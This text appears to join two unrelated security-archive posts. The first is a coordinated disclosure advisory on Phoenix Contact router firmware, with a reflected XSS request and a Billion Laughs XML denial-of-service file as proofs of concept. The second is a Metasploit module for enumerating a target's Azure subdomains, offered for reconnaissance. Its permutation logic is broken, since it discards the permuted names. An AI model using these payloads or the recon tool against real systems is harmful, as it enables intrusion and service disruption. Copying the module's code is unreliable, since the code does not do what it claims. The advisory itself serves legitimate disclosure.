<pre><code>St. Pölten UAS<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Phoenix Contact TC Cloud Client 1002-4G*,<br /> | TC Router 3002T-4G, Cloud Client 1101T-TX/TX<br /> vulnerable version| <2.07.2, <2.07.2, <2.06.10<br /> fixed version| 2.07.2, 2.07.2, 2.06.10<br /> CVE number| CVE-2023-3526, CVE-2023-3569<br /> impact| Medium<br /> homepage| https://www.phoenixcontact.com/<br /> found| 2023-05-04<br /> by| A. Resanovic, S. Stockinger, T. Etzenberger<br /> | This vulnerability was discovery during research at<br /> | St. Pölten UAS, supported and coordinated by CyberDanube.<br /> |<br /> | https://fhstp.ac.at | https://cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"At Phoenix Contact, our approach is innovative, sustainable, and based on<br />partnership. This applies to how we deal with employees as well as with our<br />customers. We are also conscious of our social and environmental responsibility<br />and we act accordingly. With the vision of the All Electric Society, we also<br />want to empower our customers to act more sustainably by enabling the<br />comprehensive electrification, networking, and automation of all sectors of the<br />economy and infrastructure with our products and solutions."<br /><br />Source: https://www.phoenixcontact.com/en-us/ueber-uns<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />TC Router 3002T-4G* / <2.0.2<br />TC Cloud Client 1002-4G* / <2.07.2<br />Cloud Client 1101T-TX/TX / <2.06.10<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526<br />A reflected cross-site scripting vulnerability can be triggerd in the license<br />viewer of the device. This can be used to execute malicious code in the context<br />of a user's browser. Cookies may be also stoled via this way.<br /><br />2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569<br />By abusing the configuration file upload functionality of the device, it is<br />possible to slow down all other processes.<br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526<br />The reflected cross-site scripting vulnerability can be triggered by using the<br />following GET request:<br />https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15"><script>alert("document.cookie")</script><br /><br />2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569<br />The following configuration file can be used to exploit the binary<br />"/usr/bin/xmlconfig", which supportes entity reference nodes:<br />===============================================================================<br /><?xml version="1.0"?><br /><!DOCTYPE lolz [<br /><!ENTITY lol "lol"><br /><!ELEMENT lolz (#PCDATA)><br /><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><br /><!ENTITY lol2<br />"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><br /><!ENTITY lol3<br />"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><br /><!ENTITY lol4<br />"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><br /><!ENTITY lol5<br />"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><br /><!ENTITY lol6<br />"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><br /><!ENTITY lol7<br />"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><br /><!ENTITY lol8<br />"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><br /><!ENTITY lol9<br />"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"><br />]><br /><lolz>&lol9;</lolz><br />===============================================================================<br /><br />The vulnerability was manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Update to the latest available firmware version.<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />Phoenix Contact customers are advised to upgrade the firware to the latest<br />available version.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2023-05-16: Contacting vendor via psirt@phoenixcontact.com<br />2023-05-17: Vendor informed internal product team.<br />2023-05-18: Added responsible disclosure policy from St. Poelten UAS.<br />2023-05-19: Vendor needs more time to fix the issues.<br />2023-06-15: Vendor asked for an explaination of the issues as he cannot<br /> reproduce them; Sent screenshots and more PoCs to the vendor.<br /> Offered an MS Teams call to clarify the issues.<br />2023-06-16: Scheduled a call for 2023-06-19.<br />2023-06-19: Clarified issues and further timeline for the coordination.<br /> Vendor proposed to release the firmware on 2023-07-13.<br />2023-07-04: Contact stated that he has to shift the release after July. It<br /> will be released on 08.08.2023; Confirmed the date.<br />2023-07-13: Received CVE numbers from vendor.<br />2023-07-18: Received firmware versions from vendor.<br />2023-07-23:_Vendor released firmwares.<br />2023-08-08: Coordinated release of security advisory.<br /><br />Web: https://www.fhstp.ac.at/<br />Twitter: https://twitter.com/fh_stpoelten<br />Mail: mis at fhstp dot ac dot at<br /><br />EOF T. Weber / @2023<br /><br /><br /></code></pre>
<pre><code>*Background:*<br /><br />Microsoft makes use of a number of different domains and subdomains for<br />each of their Azure services. From SQL databases to SharePoint drives, each<br />service maps to its respective domain/subdomain, and with the proper<br />toolset, these can be identified through DNS enumeration to yield<br />information about the target domain's infrastructure.<br />enum_azuresubdomains.rb is a Metasploit module for enumerating public Azure<br />services by validating legitimate subdomains through various DNS record<br />queries. This cloud reconnaissance module rapidly identifies API services,<br />storage accounts, key vaults, databases, and more! Expedite your cloud<br />reconnaissance phases with enum_azuresubdomains.rb.<br /><br />*Code:*<br /><br />##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::DNS::Enumeration<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Azure Subdomain Scanner and Enumerator',<br /> 'Description' => 'This module can be used for enumerating public<br />Azure services by locating valid subdomains through various DNS queries.',<br /> 'Author' => ['RoseSecurity <RoseSecurityConsulting[at]protonmail.me<br />>'],<br /> 'References' => ['<br />www.netspi.com/blog/technical/cloud-penetration-testing/enumerating-azure-services'<br />],<br /> 'License' => MSF_LICENSE<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('DOMAIN', [true, 'The target domain without TLD (Ex:<br />victim rather than victim.org)']),<br /> OptBool.new('PERMUTATIONS',<br /> [false,<br /> 'Prepend and append permutated keywords to domain',<br />false]),<br /> OptBool.new('ENUM_A', [true, 'Enumerate DNS A record', true]),<br /> OptBool.new('ENUM_CNAME', [true, 'Enumerate DNS CNAME record',<br />true]),<br /> OptBool.new('ENUM_MX', [true, 'Enumerate DNS MX record', true]),<br /> OptBool.new('ENUM_NS', [true, 'Enumerate DNS NS record', true]),<br /> OptBool.new('ENUM_SOA', [true, 'Enumerate DNS SOA record', true]),<br /> OptBool.new('ENUM_TXT', [true, 'Enumerate DNS TXT record', true])<br /> ]<br /> )<br /> end<br /><br /> def dns_enum(target_domains)<br /> target_domains.each do |domain|<br /> next unless dns_get_a(domain)<br /><br /> print_good("Discovered Target Domain: #{domain} \n")<br /> dns_get_a(domain) if datastore['ENUM_A']<br /> dns_get_cname(domain) if datastore['ENUM_CNAME']<br /> dns_get_ns(domain) if datastore['ENUM_NS']<br /> dns_get_mx(domain) if datastore['ENUM_MX']<br /> dns_get_soa(domain) if datastore['ENUM_SOA']<br /> dns_get_txt(domain) if datastore['ENUM_TXT']<br /> end<br /> end<br /><br /> def run<br /> # Array of subdomains to enumerate<br /> domain = datastore['DOMAIN']<br /> subdomains = [<br /> '.onmicrosoft.com',<br /> '.scm.azurewebsites.net',<br /> '.azurewebsites.net',<br /> '.p.azurewebsites.net',<br /> '.cloudapp.net',<br /> '.file.core.windows.net',<br /> '.blob.core.windows.net',<br /> '.queue.core.windows.net',<br /> '.table.core.windows.net',<br /> '.mail.protection.outlook.com',<br /> '.sharepoint.com',<br /> '.redis.cache.windows.net',<br /> '.documents.azure.com',<br /> '.database.windows.net',<br /> '.vault.azure.net',<br /> '.azureedge.net',<br /> '.search.windows.net',<br /> '.azure-api.net',<br /> '.azurecr.io'<br /> ]<br /><br /> # Array of keywords to prepend and append<br /> permutations = %w[<br /> root<br /> web<br /> api<br /> azure<br /> azure-logs<br /> data<br /> database<br /> data-private<br /> data-public<br /> dev<br /> development<br /> demo<br /> files<br /> filestorage<br /> internal<br /> keys<br /> logs<br /> private<br /> prod<br /> production<br /> public<br /> service<br /> services<br /> splunk<br /> sql<br /> staging<br /> storage<br /> storageaccount<br /> test<br /> useast<br /> useast2<br /> centralus<br /> northcentralus<br /> westcentralus<br /> westus<br /> westus2<br /> ]<br /><br /> # Create permutated array of keywords and target domain<br /> if datastore['PERMUTATIONS']<br /> permutated_domains = []<br /> permutations.each do |keywords|<br /> permutated_domains.append("#{domain}-#{keywords}")<br /> permutated_domains.append("#{keywords}-#{domain}")<br /> end<br /> # Permutated and Normal list of subdomains<br /> target_domains = []<br /> subdomains.each do |tld|<br /> target_domains.append(domain + tld)<br /> permutated_domains.each do |_subdomain|<br /> target_domains.append(domain + tld)<br /> end<br /> end<br /> # Query DNS records of permutated and normal target subdomains<br /> else<br /> # Query DNS records of normal target subdomains<br /> target_domains = []<br /> subdomains.each do |tld|<br /> target_domains.append(domain + tld)<br /> end<br /> end<br /> dns_enum(target_domains)<br /> end<br />end<br /></code></pre>